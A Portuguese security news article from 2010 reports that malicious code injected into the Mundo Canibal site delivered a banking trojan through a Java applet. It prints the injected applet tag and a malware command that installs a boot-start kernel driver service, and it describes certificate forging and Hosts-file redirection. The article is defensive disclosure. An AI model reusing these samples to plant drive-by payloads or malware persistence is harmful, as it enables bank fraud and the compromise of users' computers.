Linha Defensiva

Site Mundo Canibal, do UOL, é comprometido por código malicioso

Vírus forja certificados SSL e ataca internautas por meio do Java usando um site popular.
Diogo Baptista | 12/12/2010 03h07

A Linha Defensiva detectou um código malicioso na página principal do site Mundo Canibal na noite deste sábado (11/12). O código, um iframe, fazia com que o navegador executasse um applet Java malicioso. Usuários que tinham o Java ativado se depararam com uma mensagem do navegador solicitando que fosse executado o aplicativo inseguro, semelhante a imagem abaixo:

Mensagem de alerta do Java

A mensagem de alerta do Java, solicitando permissão para executar o vírus.

O usuário que clicar em “Executar” ou “Run” será imediatamente infectado, apesar de estar em um site legítimo. Após a infecção, o vírus falsifica os certificados de segurança para exibir o cadeado SSL em páginas de banco redirecionadas. Tentar o acesso ao internet banking de alguns bancos a partir do computador infectado resultará no roubo de dados e, como consequência, numa fraude bancária.

A Linha Defensiva recomenda que o Java seja desativado, porque poucos sites necessitam dele atualmente e ele está envolvido em muitos ataques. Veja como fazer isso no final dessa reportagem do G1.

Informações técnicas

O código inserido na página inicial apontava para outra página hospedada no próprio site Mundo Canibal. Ela fazia com que o navegador executasse o applet malicioso, com o seguinte código:

<applet name=”Mundo Canibal  IMPORTANTE: (Para executar corretamente o site clique em `Run.)” code=”le.class” archive=”http://mundocanibal.uol.com.br/includes/extras/eventos/17/fotos/dtm.jar” width=0 height=0><param value=””></applet>

Ao permitir a execução de tal aplicativo, o navegador fazia com que o arquivo le.class (um dos arquivos integrantes do arquivo principal, dtm.jar) realizasse uma série de atividades a fim infectar o computador.

Arquivo de certificados do Firefox

Certificados falsificados para sites de bancos no Firefox.

Uma delas é forjar certificados utilizados pelo Firefox de algumas instituições bancárias, alterando o arquivo cert_override.txt do navegador da Mozilla. Em recente reportagem para o G1, Altieres Rohr identificou programas maliciosos capazes de alterar certificados de segurança, semelhante ao que este applet que estava no site Mundo Canibal faz. Outra instrução realizada pelo applet era a criação de outras entradas forjadas, no Registro do Windows, através de um arquivo .reg criado na infecção.

O mesmo applet alterava o arquivo Hosts para redirecionar o navegador a páginas maliciosas sempre que o internet banking de algumas instituições financeiras for acessado.

O vírus ainda criava um arquivo no computador na pasta C:\WINDOWS\system32\drivers, com o nome actusb.sys, sendo o mesmo executado como um serviço do sistema (driver), como pode ser observado nas strings analisadas:

cmd /c sc create actusb binPath= “system32\drivers\actusb.sys” group= “Act Group” type= kernel start= boot error= normal DisplayName= “ACtUsb”

Isso fazia com que o serviço fosse iniciado automaticamente, a cada reinicialização do sistema.

Segundo a análise feita do arquivo no VirusTotal, ele não é detectado pela maioria dos antivírus, pelo menos em seus mecanismos de assinatura, demonstrando a fragilidade dos programas de segurança em face da criação de novos programas maliciosos.

O site Mundo Canibal foi alertado imediatamente, fazendo com que os arquivos fossem prontamente retirados do ar algumas horas após o ocorrido.

 
imprimir
Compartilhe
Comentar

Comentários

Os comentários são de responsabilidade de seus respectivos autores

  • Iftá-El Systemieven

    Todos nós estamos sujeitos a esse tipo de coisa no mundo virtual. Mais é impressionante como uma empresa como o UOL que vende “segurança” deixa isso acontecer. É decepcionante.

 
 
Boletim informativo Cadastre-se e receba em seu e-mail

Anuncie | Termos de Uso | Politica de Privacidade | WP

Editado por Altieres Rohr. Mantido pelo Staff Linha Defensiva

Contato Geral:

Parceiro
Site Seguro